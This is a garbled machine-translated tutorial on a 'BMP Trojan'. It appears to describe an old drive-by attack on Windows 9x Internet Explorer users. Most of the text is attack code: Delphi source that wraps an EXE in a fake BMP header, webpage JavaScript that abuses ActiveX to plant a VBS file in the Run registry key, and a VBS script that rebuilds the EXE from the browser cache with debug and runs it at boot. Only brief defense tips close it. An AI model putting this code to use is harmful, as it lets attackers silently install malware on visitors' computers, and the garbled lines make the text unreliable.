Detailed description of BMP Trojan

First of all, this is not a new thing, but some people have recently said that we do not have it. Article Put it on. Let's test it by yourself. What is BMP webpage Trojan? It is different from a trojan that used to have a smelly MIME Header Vulnerability. The mime trojan uses mime to encode an EXE file into an EML (out look mail) file, put it on the webpage and use the IE and OE encoding vulnerabilities for automatic download and execution.
However, BMP Trojans are different. They disguise an EXE file as a BMP image file, cheat IE to automatically download it, and then use JavaScript scripts on the webpage to find the Temporary Internet folder of the client, find the downloaded BMP file and copy it to the temp directory. write a script to restore the BMP file to EXE with debug, and put it in the Registry Startup item, and execute it at the next boot. however, this technology can only play a role under 9X. For 2 K, XP is powerless.

It seems complicated. Let's take a step:
1) how to change EXE to BMP.
You will find the BMP file information by yourself. The file header of the BMP file contains 54 bytes. In short, it contains the length, width, digits, file size, and data area length of the BMP file, we only need to add the corresponding BMP file header before the file header of the EXE file (of course, the data in the BMP file header must meet the size of the EXE file), so that we can cheat IE to download the BMP file, at the beginning, we tried JPG files and found that if the file header is incorrect, ie will not download the file.CodeAs follows:

Program exe2bmp;

Uses
Windows,
Sysutils;

VaR Len, row, Col, FS: DWORD;
Buffer: array [0 .. 255] of char;
FD: win32_find_data;
H, HW: thandle;

Begin
If (paramstr (1) <>) and (paramstr (2) <>) then begin // exit if there are no two parameters after running
If fileexists (paramstr (1) then begin
Findfirstfile (pchar (paramstr (1), FD );
FS: = FD. nfilesizelow;
Col: = 4;
While true do begin
If (FS mod 12) = 0 then begin
Len: = FS;
End else Len: = FS + 12-(FS mod 12 );
Row: = Len Div Col Div 3;
If row> Col then begin
Col: = Col + 4;
End else break;
End;
Fillchar (buffer, 256, 0 );
{BMP file header data}
Buffer [0]: = B; buffer [1]: = m;
Pdword (@ buffer [18]) ^: = Col;
Pdword (@ buffer [22]) ^: = row;
Pdword (@ buffer [34]) ^: = Len;
Pdword (@ buffer [2]) ^: = Len + 54;
Pdword (@ buffer [10]) ^: = 54;
Pdword (@ buffer [14]) ^: = 40;
Pword (@ buffer [26]) ^: = 1;
Pword (@ buffer [28]) ^: = 24;
{Write File}
HW: = createfile (pchar (paramstr (2), generic_write, file_1__read or file_1__write, nil, create_always, 0, 0 );
H: = createfile (pchar (paramstr (1), generic_read, file_1__read or file_1__write, nil, open_existing, 0, 0 );
Writefile (HW, buffer, 54, Col, 0 );
Repeat
Readfile (H, buffer, 256, Col, 0 );
Writefile (HW, buffer, Col, Col, 0 );
Untilcol<> 256;
Writefile (HW, buffer, len-Fs, Col, 0 );
Closehandle (h );
Closehandle (HW );
End;
End;
End.

The above code can be compiled in delphi4, 5, and 6 to get an exe2bmp .exe file. You can open the msdos mode and enter
Exe2bmp myexe.exe mybmp
Press enter to convert the EXE file specified by the second parameter to the BMP format.
The next step is to put this BMP image on the webpage. If you open this image, you will surely find that this BMP image is colorful and monotonous. Therefore, it is best to use this format when you put it on the webpage.

The following is the script on the web page.
Document. Write ();
Function docsave ()
{
A = Document. Applets [0];
A. setclsid ({F935DC22-1CF0-11D0-ADB9-00C04FD58A0B });
A. createinstance ();
Wsh = A. GetObject ();
A. setclsid ({0d43fe01-f093-11cf-8940-00a0c9054228 });
A. createinstance ();
FSO = A. GetObject ();
VaR winsys = FSO. getspecialfolder (1 );
VaR vbs = winsys + \ s. vbs;
Wsh. regwrite
(Hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ vbs, wscript + "+ vbs + ");
VaR ST = FSO. createtextfile (vbs, true );
St. writeline (option explicit );
St. writeline (dim fso, wsh, cache, STR );
St. writeline (set FSO = Createobject ("scripting. FileSystemObject "));
St. writeline (set wsh = Createobject ("wscript. Shell "));
St. writeline (Cache = wsh. regread ("hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Explorer \ shellfolders \ cache "));
St. writeline (wsh. regdelete ("hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ vbs "));
St. writeline (wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ tmp", "tmp.exe ");
St. writeline (searchbmp file FSO. getfolder (cache), "mybmp pai1).bmp ");
St. writeline (wscript. Quit ());
St. writeline (function searchbmp file (folder, fname ));
St. writeline (DIM subfolder, file, LT, TMP, winsys );
St. writeline (STR = FSO. getparentfoldername (folder) & "\" & folder. Name & "\" & fname );
St. writeline (if FSO. fileexists (STR) Then );
St. writeline (TMP = FSO. getspecialfolder (2 )&"\\");
St. writeline (winsys = FSO. getspecialfolder (1 )&"\\");
St. writeline (set file = FSO. GetFile (STR ));
St. writeline (file. Copy (TMP & "tmp. dat "));
St. writeline (file. delete );
St. writeline (set lT = FSO. createtextfile (TMP & "tmp. In "));
St. writeline (LT. writeline ("RBx "));
St. writeline (LT. writeline ("0 "));
St. writeline (LT. writeline ("rcX "));
St. writeline (LT. writeline ("1000 "));
St. writeline (LT. writeline ("w136 "));
St. writeline (LT. writeline ("Q "));
St. writeline (LT. Close );
St. writeline (wsh. run "command/C debug" & TMP & "tmp. dat <"& TMP &" tmp. in> "& TMP &" tmp. out ", false, 6 );
St. writeline (on error resume next );
St. writeline (FSO. GetFile (TMP & "tmp. dat"). Copy (winsys & "tmp.exe "));
St. writeline (FSO. GetFile (TMP & "tmp. dat"). delete );
St. writeline (FSO. GetFile (TMP & "tmp. In"). delete );
St. writeline (FSO. GetFile (TMP & "tmp. Out"). delete );
St. writeline (end if );
St. writeline (if folder. subfolders. Count <> 0 then );
St. writeline (for each subfolder in folder. subfolders );
St. writeline (searchbmp file subfolder, fname );
St. writeline (next );
St. writeline (end if );
St. writeline (end function );
St. Close ();
}
SetTimeout (docsave (), 1000 );

Save the script as "Js. js" and insert it into the webpage:

This script will generate a "S. vbs" file in the system directory of the local machine, which will automatically run at the next boot. The main purpose is to find the mybmp transfer 12.16.bmp file from the overview directory.
The main content of the "S. vbs" file is as follows:

Option explicit
Dim FSO, wsh, cache, STR
Set FSO = Createobject ("scripting. FileSystemObject ")
Set wsh = Createobject ("wscript. Shell ")
Cache = wsh. regread ("hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Explorer \ shellfolders \ cache ")
Wsh. regdelete ("hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ vbs ")
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ tmp", "tmp.exe"
Searchbmp file FSO. getfolder (cache), "mybmp 201712.16.bmp"
Wscript. Quit ()
Function searchbmp file (folder, fname)
Dim subfolder, file, LT, TMP, winsys
Find the target BMP image from the Temporary Folder
STR = FSO. getparentfoldername (folder) & "\" & folder. Name & "\" & fname
If FSO. fileexists (STR) then
TMP = FSO. getspecialfolder (2 )&"\"
Winsys = FSO. getspecialfolder (1 )&"\"
Set file = FSO. GetFile (STR)
File. Copy (TMP & "tmp. dat ")
File. Delete
Generate a debug script
Set lT = FSO. createtextfile (TMP & "tmp. In ")
Lt. writeline ("RBx ")
Lt. writeline ("0 ")
Lt. writeline ("rcX ")
The 1000 in the following row is in hexadecimal format and the decimal format is 4096 (This number is the size of your EXE file)
Lt. writeline ("1000 ")
Lt. writeline ("w136 ")
Lt. writeline ("Q ")
Lt. Close
Wsh. Run "command/C debug" & TMP & "tmp. dat <" & TMP & "tmp. In>" & TMP & "tmp. Out", false, 6
On Error resume next
FSO. GetFile (TMP & "tmp. dat"). Copy (winsys & "tmp.exe ")
FSO. GetFile (TMP & "tmp. dat"). Delete
FSO. GetFile (TMP & "tmp. In"). Delete
FSO. GetFile (TMP & "tmp. Out"). Delete
End if
If folder. subfolders. Count <> 0 then
For each subfolder in folder. subfolders
Searchbmp file subfolder, fname
Next
End if
End Function

This script will find the BMP file in the Temporary Folder and generate a debug script. The runtime will automatically read the data of the specified size from the 54 bytes of the BMP file, and save it to TMP. dat. the subsequent script copies it to the system directory. the restored EXE file will be run at the next restart. this is the basic implementation process of BMP Trojans.
For detailed script code, see http://hotsky.363.net

Defense methods:
To simplify the process, delete or rename the wscrpit.exe file and debug file;
Install effective anti-virus software because many of these scripts can be found out.
If conditions permit, install Win2k SP3 and try to avoid visiting websites with no names.